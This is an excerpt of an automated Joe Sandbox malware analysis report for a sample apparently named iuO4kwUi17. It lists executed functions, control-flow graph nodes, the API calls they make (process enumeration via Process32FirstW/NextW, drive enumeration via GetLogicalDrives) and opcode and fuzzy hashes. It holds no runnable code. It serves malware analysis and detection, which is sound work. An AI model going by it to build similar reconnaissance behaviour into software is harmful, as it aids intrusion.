75f00e4 11878 75f00f2 Process32NextW 11877->11878 11880 75f04bd 11878->11880 11387 75a039e GetLogicalDrives 11388 75a03e6 11387->11388 11905 75f00b5 11907 75f0018 11905->11907 11909 75f00b8 Process32NextW 11905->11909 11906 75f0096 Process32NextW 11906->11907 11907->11906 11908 75f0094 11907->11908 11911 75f04bd 11909->11911

                                    Executed Functions

                                    Function 075E0069 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 278COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 75e0069-75e02e7 call 75e02d8 27 75e02c8-75e02e7 0->27 28 75e02e9-75e03a5 0->28 27->27 27->28 38 75e03b6-75e03dc Process32FirstW 28->38 40 75e03ec-75e0457 38->40 45 75e046c-75e04cf call 75e04d7 40->45 52 75e046a-75e046b 45->52 53 75e04d1-75e04d5 45->53 52->45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID: ?
                                    • API String ID: 2623510744-1684325040
                                    • Opcode ID: c8ae15b34f754719913a63abdcb118e846e5e3c409382cdf5b94e7db5ea58c49
                                    • Instruction ID: 4d999c6aafea241a19e89d5c634999359c79062d2afa42239af701f8e88df910
                                    • Opcode Fuzzy Hash: c8ae15b34f754719913a63abdcb118e846e5e3c409382cdf5b94e7db5ea58c49
                                    • Instruction Fuzzy Hash: 8E5127FB56C220BEA20A85955F50AFA676EF6D7330F30882AF40FC75C2E3E54A095171
                                    Function 075A01B2 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 558bce3486833d65449634d78ca2067ca31973757a938c54091272fcdbd0c750
                                    • Instruction ID: 9bead730af937c942b12befed85fc0dc9df47c26f7ffccf987050a95011d1da1
                                    • Opcode Fuzzy Hash: 558bce3486833d65449634d78ca2067ca31973757a938c54091272fcdbd0c750
                                    • Instruction Fuzzy Hash: 2F4157E797C224BEA64285A14B949FE6B6EF9D3230F304C37F40BC65C2F2954A064271
                                    Function 075A0234 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 154COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 130 75a0234-75a03ab call 75a0267 150 75a03b6-75a03cd GetLogicalDrives 130->150 151 75a03e6-75a0443 150->151 155 75a0450-75a046f call 75a0475 151->155 158 75a0471-75a0473 155->158
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: daa53bcde5815f21065cad6206ad5d2bf8d8e8b5dad83e3edaf66ff8204e177c
                                    • Instruction ID: 758298e50222deefd86178e2d6fe9046c8ad08447b640c1b959a75762d20dec3
                                    • Opcode Fuzzy Hash: daa53bcde5815f21065cad6206ad5d2bf8d8e8b5dad83e3edaf66ff8204e177c
                                    • Instruction Fuzzy Hash: 163133E797C215BE6242859157505FE6B6DFAD7630B308D37F40BC5682F2A50A094131
                                    Function 075A0220 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 154COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 99 75a0220-75a03ab call 75a0267 121 75a03b6-75a03cd GetLogicalDrives 99->121 122 75a03e6-75a0443 121->122 126 75a0450-75a046f call 75a0475 122->126 129 75a0471-75a0473 126->129
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 20f6342b50a115de6ee4151a0e9a5fe559af57c3db49a475e594f0b1fad8c862
                                    • Instruction ID: 77d82df42a4589cf076576e68fa8fef48212d02d011935a6807d6d2b4ef7ef03
                                    • Opcode Fuzzy Hash: 20f6342b50a115de6ee4151a0e9a5fe559af57c3db49a475e594f0b1fad8c862
                                    • Instruction Fuzzy Hash: 3B3122E797C215BE624181955754AFE6B6DF9D7230F308C37F40FC5A82F2D50A095132
                                    Function 075A02D5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 154COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 159 75a02d5-75a03ab 171 75a03b6-75a03cd GetLogicalDrives 159->171 172 75a03e6-75a0443 171->172 176 75a0450-75a046f call 75a0475 172->176 179 75a0471-75a0473 176->179
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: b494d201928a237972543737482677f0e850bce7c6af646e182f83bbc0d55968
                                    • Instruction ID: 2d3c774a79ec85c214043588055d307246e31e0b751c702c34fb974acd898b19
                                    • Opcode Fuzzy Hash: b494d201928a237972543737482677f0e850bce7c6af646e182f83bbc0d55968
                                    • Instruction Fuzzy Hash: 573149E797C224BEA24285A55B905FF2F6DF9D3630B308D37F44BC6586F2A50A065131
                                    Function 075A0229 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 180 75a0229-75a03ab call 75a0267 201 75a03b6-75a03cd GetLogicalDrives 180->201 202 75a03e6-75a0443 201->202 206 75a0450-75a046f call 75a0475 202->206 209 75a0471-75a0473 206->209
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: b1b5ed1152e04d17716f22ad22513fa646126663e450f1a8ffa19f24a9387149
                                    • Instruction ID: 247bfaa1323b8095fe8f283737c60b6524924c4d946105fddcb6cc25815978e2
                                    • Opcode Fuzzy Hash: b1b5ed1152e04d17716f22ad22513fa646126663e450f1a8ffa19f24a9387149
                                    • Instruction Fuzzy Hash: 1A3120E797C225BE6242819557449FE6B6DFAD7230F308D37B40BC5682F2A50A095132
                                    Function 075A024D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 148COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 210 75a024d-75a03ab call 75a0267 230 75a03b6-75a03cd GetLogicalDrives 210->230 231 75a03e6-75a0443 230->231 235 75a0450-75a046f call 75a0475 231->235 238 75a0471-75a0473 235->238
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: a20fc201facf3c202fbfd4af87ef172207a6bae9d6440112004c91014ff38eb4
                                    • Instruction ID: fde874c900b017528040469ce539f6c71de4169108a0d723d77b0a736d94098a
                                    • Opcode Fuzzy Hash: a20fc201facf3c202fbfd4af87ef172207a6bae9d6440112004c91014ff38eb4
                                    • Instruction Fuzzy Hash: 6B3132E797C225BE6242819557949FF6BADF6D7230F308D37F80BC5682F2E50A095232
                                    Function 075A027E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 144COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 239 75a027e-75a0286 240 75a0288-75a028b 239->240 241 75a028d-75a0294 239->241 242 75a0296-75a03ab 240->242 241->242 256 75a03b6-75a03cd GetLogicalDrives 242->256 257 75a03e6-75a0443 256->257 261 75a0450-75a046f call 75a0475 257->261 264 75a0471-75a0473 261->264
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 549c1b6ee52f1eb3f94d3291992443733b639240eb6b80d01ad65d991d646eba
                                    • Instruction ID: 720c7c59be45bf3de4dfd6b99afe5cae54e08135114682622055560c1a9824ba
                                    • Opcode Fuzzy Hash: 549c1b6ee52f1eb3f94d3291992443733b639240eb6b80d01ad65d991d646eba
                                    • Instruction Fuzzy Hash: 743133E797C215BEB24281955B545FF2BADF5D3230B308937F40BC9682F2E90A0A5232
                                    Function 075A0267 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 139COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 265 75a0267-75a03ab 282 75a03b6-75a03cd GetLogicalDrives 265->282 283 75a03e6-75a0443 282->283 287 75a0450-75a046f call 75a0475 283->287 290 75a0471-75a0473 287->290
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: aea2ed45cbe47e95f1a47fcb587fdb2aee58dc7eca26529a3455709fe1b27c2a
                                    • Instruction ID: 9cd6d9120bd34d890605e6041f47f376ef2ad26978f89145741b3b04fb89b3b6
                                    • Opcode Fuzzy Hash: aea2ed45cbe47e95f1a47fcb587fdb2aee58dc7eca26529a3455709fe1b27c2a
                                    • Instruction Fuzzy Hash: 8C2101E797C215BE624281969B549FF2BADF5D3230B308937F40BC5681F2E40A495132
                                    Function 075A0273 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 137COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 291 75a0273-75a03ab 308 75a03b6-75a03cd GetLogicalDrives 291->308 309 75a03e6-75a0443 308->309 313 75a0450-75a046f call 75a0475 309->313 316 75a0471-75a0473 313->316
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: bdfc64ae351dd3d9d3b76f97e06e0bcb08f72ff3c6ff67b24776d776bf0dae54
                                    • Instruction ID: f4aafbf5d98291e0a82a9dc4b9dfd42283340a4bd726e173a0267f2bcd9984dd
                                    • Opcode Fuzzy Hash: bdfc64ae351dd3d9d3b76f97e06e0bcb08f72ff3c6ff67b24776d776bf0dae54
                                    • Instruction Fuzzy Hash: B621F2E797C215BE624281955B509FF2BADF5D3630B308937F40BC5681F2A40A095132
                                    Function 075A02A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 317 75a02a2-75a03ab 333 75a03b6-75a03cd GetLogicalDrives 317->333 334 75a03e6-75a0443 333->334 338 75a0450-75a046f call 75a0475 334->338 341 75a0471-75a0473 338->341
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: f0225d093658fd98aa02bcd58c16e5ae737702b0117dd617b6be86c3ab25efbf
                                    • Instruction ID: f57c121426141153291c4dfcf174eef7232d29124ba9c26ed30f6e33870b5496
                                    • Opcode Fuzzy Hash: f0225d093658fd98aa02bcd58c16e5ae737702b0117dd617b6be86c3ab25efbf
                                    • Instruction Fuzzy Hash: 982101EBD7C215BE724281A56B549FF2B6DF5D3630B308D37F40BC5581F2A40A055132
                                    Function 075A0290 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 342 75a0290-75a03ab 357 75a03b6-75a03cd GetLogicalDrives 342->357 358 75a03e6-75a0443 357->358 362 75a0450-75a046f call 75a0475 358->362 365 75a0471-75a0473 362->365
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 42459e32117d3195cf473832b940e13e2128feeb0329cfb4b84dad8aad6fcbe5
                                    • Instruction ID: abff08a1cd9a0a2c6921aa2528650a740fbdb2d53229829348d2b2d61a88740d
                                    • Opcode Fuzzy Hash: 42459e32117d3195cf473832b940e13e2128feeb0329cfb4b84dad8aad6fcbe5
                                    • Instruction Fuzzy Hash: 1221F1E797C215BE724285965B509FF6BADF5D3630B308837F40BC5682F2E40A095232
                                    Function 075F00B5 Relevance: 1.9, APIs: 1, Instructions: 404COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 366 75f00b5-75f00b6 367 75f00b8-75f0495 366->367 368 75f0076-75f0077 366->368 422 75f04a0-75f04a7 Process32NextW 367->422 370 75f0079 368->370 371 75f0083-75f0092 call 75f0096 368->371 372 75f007b-75f007f 370->372 373 75f0018-75f0024 370->373 380 75f0094 371->380 381 75f0031-75f003c 371->381 372->371 376 75f003d-75f007f 373->376 376->371 381->376 423 75f04bd-75f05bc call 75f05be 422->423
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 612d8a655fc677699221afa58cc6aed3152d4a3d82ee05c8f8283fe099c6dea4
                                    • Instruction ID: 41400dad094da5f39879ab98defd9dde05311b473cfb4233ded3928979c3ad28
                                    • Opcode Fuzzy Hash: 612d8a655fc677699221afa58cc6aed3152d4a3d82ee05c8f8283fe099c6dea4
                                    • Instruction Fuzzy Hash: D17149EB65C121BDB15291416F24EFB576EF1D7730B38CC26FA0BD6583E2990A4E1071
                                    Function 075F0096 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 439 75f0096-75f0495 483 75f04a0-75f04a7 Process32NextW 439->483 484 75f04bd-75f05bc call 75f05be 483->484
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 54dbe419c090828d2b314ff907c9ebcf8a2faa68615fdad05ff4388b7c3e9432
                                    • Instruction ID: 1d3bc0ff4f299755781d4ecaf6efe537f53da092a5c35c266c3ead84bfc07f6c
                                    • Opcode Fuzzy Hash: 54dbe419c090828d2b314ff907c9ebcf8a2faa68615fdad05ff4388b7c3e9432
                                    • Instruction Fuzzy Hash: 5A7138EB26C121BD714291426F64EFB576EF1D7730B38CC26FA0BD6583E2990A4E1071
                                    Function 075F00F8 Relevance: 1.9, APIs: 1, Instructions: 386COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 500 75f00f8-75f0107 501 75f0109 500->501 502 75f00e8-75f00f3 500->502 504 75f010b-75f0495 501->504 502->504 544 75f04a0-75f04a7 Process32NextW 504->544 545 75f04bd-75f05bc call 75f05be 544->545
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b8e49f2b5e1eaaca4b6cffabc1cbccff289c7d663621e90c22e96620be0e0bd7
                                    • Instruction ID: 77fe2a6802c9a49636bd315d7d9aab62b1c24de9b2002305bbcea7d52d39effb
                                    • Opcode Fuzzy Hash: b8e49f2b5e1eaaca4b6cffabc1cbccff289c7d663621e90c22e96620be0e0bd7
                                    • Instruction Fuzzy Hash: 007137EB25C121BDB14291426F64EFB576EF1D7730B38C82AFA0BC6583E3894A4E1071
                                    Function 075F00E4 Relevance: 1.9, APIs: 1, Instructions: 380COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 187aa07245eab2c1f95f04dbe39a20a3b87ac05b63cb28e834f76dd60cfb9be3
                                    • Instruction ID: 30c5a1c651cbf15827f2b0d0a1fcbf3f567c5a9f230c05379a21522942953f12
                                    • Opcode Fuzzy Hash: 187aa07245eab2c1f95f04dbe39a20a3b87ac05b63cb28e834f76dd60cfb9be3
                                    • Instruction Fuzzy Hash: B06105EB26D121BD714291426F64EFB576EF1D7730B38C82AFA0BD6583E3894A4E1071
                                    Function 075F0124 Relevance: 1.9, APIs: 1, Instructions: 372COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d98d2e9f24202ea0eba169dcd347ca7dff59a63cfa59d6870099633451f4bb26
                                    • Instruction ID: e59d7acadcd1237c45b7c6e189641d58198168b342087eef1f5dc098c7da44a4
                                    • Opcode Fuzzy Hash: d98d2e9f24202ea0eba169dcd347ca7dff59a63cfa59d6870099633451f4bb26
                                    • Instruction Fuzzy Hash: AC6115EB25C121BD714291426F24EFB576EF1D7730B38C82AFA0BC6583E3994A4E1071
                                    Function 075F0115 Relevance: 1.9, APIs: 1, Instructions: 371COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 158045348b671467c88ff1e636b6f5757fbf02e25c9edb0253b9ca97c393b455
                                    • Instruction ID: 0ab32954f1b4eb4de4c43c2ae6f644f614785da44b5754a48f31ccd0d70fc1d6
                                    • Opcode Fuzzy Hash: 158045348b671467c88ff1e636b6f5757fbf02e25c9edb0253b9ca97c393b455
                                    • Instruction Fuzzy Hash: DD6104EB25D121BDB14291426F24EFB576EF1D7730B38C82AFA0BC6583E3994A4E1071
                                    Function 075F012D Relevance: 1.9, APIs: 1, Instructions: 368COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 97c7c28c67e384f7233fee5a442b0bc930fd4d1c25e5aae835387d8694ac4114
                                    • Instruction ID: e0c55669e4b6f59d62e81fefd8a31e9e6b6f5761a578d0b607e81899eec84db8
                                    • Opcode Fuzzy Hash: 97c7c28c67e384f7233fee5a442b0bc930fd4d1c25e5aae835387d8694ac4114
                                    • Instruction Fuzzy Hash: EB61E4EB25C121BDB14291466F28EFB576EE1D7730B38C82AF90BC6587E3994A4A1071
                                    Function 075F01B6 Relevance: 1.9, APIs: 1, Instructions: 365COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e315e5587c7d94c144722aa337f143fe50155d9e59f7cd437adda1868febcc95
                                    • Instruction ID: e327716ee12bd3fb8d58d12e8118d539726f6b1bd69581a2f7b3fe59b37fb5fb
                                    • Opcode Fuzzy Hash: e315e5587c7d94c144722aa337f143fe50155d9e59f7cd437adda1868febcc95
                                    • Instruction Fuzzy Hash: 646105EB25C121BD714291426F68EFB576EE1D3730B38C82AF90BD6587E3890E4E1071
                                    Function 075F0155 Relevance: 1.9, APIs: 1, Instructions: 363COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 682f7a36989613699218b9591795aee60601abd215ed00fef7735a9805bffb8d
                                    • Instruction ID: ed352251fcfa4af943706d1e23b6f24848cc94881e00441f17392b1fa7d76cbb
                                    • Opcode Fuzzy Hash: 682f7a36989613699218b9591795aee60601abd215ed00fef7735a9805bffb8d
                                    • Instruction Fuzzy Hash: D661F6EB25D121BD714291426F28EFB576EE1D7730B38CC2AFA0BD6587E3990A4E1071
                                    Function 075F0148 Relevance: 1.9, APIs: 1, Instructions: 361COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 7b5d9fd16b667c590cf6471f7a8235340cacd2d3fdd5df45aa96cb52d701af6f
                                    • Instruction ID: 15484416ca78fd45eabda5bd666eb4eb523362bfff4505e0f9ae371143b92c64
                                    • Opcode Fuzzy Hash: 7b5d9fd16b667c590cf6471f7a8235340cacd2d3fdd5df45aa96cb52d701af6f
                                    • Instruction Fuzzy Hash: 2E61F4EB25C121BD714291426F28EFB576EE1D3730B38CC2AFA0BD6587E3994A4E1071
                                    Function 075F01D7 Relevance: 1.9, APIs: 1, Instructions: 360COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3b305812577d929d09c2fb8b1b69d57b8c7b26dc51042d7148d4c49996437854
                                    • Instruction ID: 773f44ca96a76fde41d6732ad67e5d684eb46e0b128e6221930b8eb4a0ccea58
                                    • Opcode Fuzzy Hash: 3b305812577d929d09c2fb8b1b69d57b8c7b26dc51042d7148d4c49996437854
                                    • Instruction Fuzzy Hash: 386105EB65D1617DB14291426F28EFB576EE1D3730B38C82AF90BD6587E3890E8E1071
                                    Function 075F016C Relevance: 1.9, APIs: 1, Instructions: 351COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: d2811e78780c55c697122bd5a82e39ed0610bf57174bc5ed115a54488148e563
                                    • Instruction ID: e9c37c7e06427d516dde74eba9d4eec3e134a9722df791f3faff22c48b45237c
                                    • Opcode Fuzzy Hash: d2811e78780c55c697122bd5a82e39ed0610bf57174bc5ed115a54488148e563
                                    • Instruction Fuzzy Hash: 3F5104EB65D121BDB14291426F28EFB576EE1D3730B38C82BF90BD6587E3990A4E1071
                                    Function 075F017A Relevance: 1.8, APIs: 1, Instructions: 350COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 9073c327333533a25649a8d200898edd2a4a5085210c6b62eb58c6018aa7f863
                                    • Instruction ID: 85545d1e6f8710a661445b7a95744ab9605f6b9135077e92092b6df963f48dcd
                                    • Opcode Fuzzy Hash: 9073c327333533a25649a8d200898edd2a4a5085210c6b62eb58c6018aa7f863
